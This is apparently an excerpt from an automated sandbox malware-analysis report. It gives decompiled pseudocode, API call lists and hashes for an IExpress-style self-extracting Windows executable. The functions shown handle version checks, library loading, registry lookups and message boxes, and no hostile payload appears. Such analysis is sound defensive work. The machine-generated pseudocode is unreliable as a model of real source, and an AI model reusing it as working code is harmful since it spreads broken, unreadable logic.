                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa49a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa48184 = 1;
                                                                                                                                                                                                                                            						 *0xa48180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa49a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa48184 = _t135;
                                                                                                                                                                                                                                            							 *0xa48180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E00A444B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00A46CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a4398d
                                                                                                                                                                                                                                            0x00a4398f
                                                                                                                                                                                                                                            0x00a4399f
                                                                                                                                                                                                                                            0x00a439a1
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a43991
                                                                                                                                                                                                                                            0x00a4398f
                                                                                                                                                                                                                                            0x00a439af
                                                                                                                                                                                                                                            0x00a439b6
                                                                                                                                                                                                                                            0x00a43a0f
                                                                                                                                                                                                                                            0x00a43a0f
                                                                                                                                                                                                                                            0x00a43a11
                                                                                                                                                                                                                                            0x00a43a13
                                                                                                                                                                                                                                            0x00a43a19
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439b8
                                                                                                                                                                                                                                            0x00a439b8
                                                                                                                                                                                                                                            0x00a439ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439bc
                                                                                                                                                                                                                                            0x00a439bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439c3
                                                                                                                                                                                                                                            0x00a439c9
                                                                                                                                                                                                                                            0x00a439ce
                                                                                                                                                                                                                                            0x00a439d0
                                                                                                                                                                                                                                            0x00a439e3
                                                                                                                                                                                                                                            0x00a439e5
                                                                                                                                                                                                                                            0x00a439e6
                                                                                                                                                                                                                                            0x00a439f1
                                                                                                                                                                                                                                            0x00a439f7
                                                                                                                                                                                                                                            0x00a439fa
                                                                                                                                                                                                                                            0x00a43a01
                                                                                                                                                                                                                                            0x00a43a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43a06
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a43a0b
                                                                                                                                                                                                                                            0x00a43a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43a09
                                                                                                                                                                                                                                            0x00a439fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439fc
                                                                                                                                                                                                                                            0x00a439d3
                                                                                                                                                                                                                                            0x00a439d8
                                                                                                                                                                                                                                            0x00a439da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a439dc
                                                                                                                                                                                                                                            0x00a439b6
                                                                                                                                                                                                                                            0x00a43955
                                                                                                                                                                                                                                            0x00a4395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43961
                                                                                                                                                                                                                                            0x00a43963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43969
                                                                                                                                                                                                                                            0x00a43915
                                                                                                                                                                                                                                            0x00a43915
                                                                                                                                                                                                                                            0x00a4391b
                                                                                                                                                                                                                                            0x00a4391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4392d
                                                                                                                                                                                                                                            0x00a43933
                                                                                                                                                                                                                                            0x00a43938
                                                                                                                                                                                                                                            0x00a4393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43940
                                                                                                                                                                                                                                            0x00a43946
                                                                                                                                                                                                                                            0x00a4394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438f2
                                                                                                                                                                                                                                            0x00a43843
                                                                                                                                                                                                                                            0x00a43845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4384b
                                                                                                                                                                                                                                            0x00a4384d
                                                                                                                                                                                                                                            0x00a43883
                                                                                                                                                                                                                                            0x00a43885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4389a
                                                                                                                                                                                                                                            0x00a4389e
                                                                                                                                                                                                                                            0x00a4389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a0
                                                                                                                                                                                                                                            0x00a438a0
                                                                                                                                                                                                                                            0x00a438a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a438a4
                                                                                                                                                                                                                                            0x00a4384f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A43723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A439C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00A439F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$cent
                                                                                                                                                                                                                                            • API String ID: 2519184315-3438608206
                                                                                                                                                                                                                                            • Opcode ID: 4be5c62929c2f1e5d856264f1c20873aa0709f2815826653eaec19d5dfe7ce96
                                                                                                                                                                                                                                            • Instruction ID: 9205155e32bfee66196b28a7c5cb752836d26f73423012aff7b95ad3f0fa9e10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4be5c62929c2f1e5d856264f1c20873aa0709f2815826653eaec19d5dfe7ce96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0091137AA012249FEF74CF69CD917AAB3B0ABC5344F1541A9D889DB242DB718F81CF01
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00A46495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00A41781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E00A4658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A464DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A464F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A46502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-258089097
                                                                                                                                                                                                                                            • Opcode ID: 44b9c22f5f04566ab44ebbd90143b4d2ab27454c36252ea41dc1cda06701b6ca
                                                                                                                                                                                                                                            • Instruction ID: f752aedc86dc90cb04dd118e3990fd64e56b52e67df76214db4974deb5066de1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b9c22f5f04566ab44ebbd90143b4d2ab27454c36252ea41dc1cda06701b6ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01F93C540108ABDB50EBA4DC45EEE7378EBE2311F500295F585921C0DF709EC6CA53
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A428E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00A42773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A42A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A42A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00A42A6F
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharUpperA.USER32(173B1603,00000000,00000000,00000000), ref: 00A427A8
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharNextA.USER32(0000054D), ref: 00A427B5
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: CharNextA.USER32(00000000), ref: 00A427BC
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42829
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42852
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42870
                                                                                                                                                                                                                                              • Part of subcall function 00A42773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A428A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A43938,?,?,?,?,-00000005), ref: 00A42958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A42969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A43938,?,?,?,?,-00000005,?), ref: 00A42A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A42A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: a9dda147aa515439744223395eda01fd8363cae2cceb4e4bc2823cb1a012e30b
                                                                                                                                                                                                                                            • Instruction ID: 63b4b55b34c97645daa2b4521ad6a5818a4b1574e975b1dcaccdd74daca32621
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9dda147aa515439744223395eda01fd8363cae2cceb4e4bc2823cb1a012e30b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2512939E00219DBDB25CF98C884AAEFBB5FF98740F54413AF945E3211DB319941DBA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A44169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A4468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A4468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A444B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A430B4), ref: 00A44189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A430B4), ref: 00A441E7
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: fb653a5114b8129167ea09ffd6fff446567b801a89c27c4ceef9afd8832a30c3
                                                                                                                                                                                                                                            • Instruction ID: 663eae1f300586ceca9d549cb0e7faea078f537d4dcfccfa2a224de73fe3be08
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb653a5114b8129167ea09ffd6fff446567b801a89c27c4ceef9afd8832a30c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F901FFBD3802247BF3242BA94C86F7B658EDBE9795F114229B706E21809AA9DC4241B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A419E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
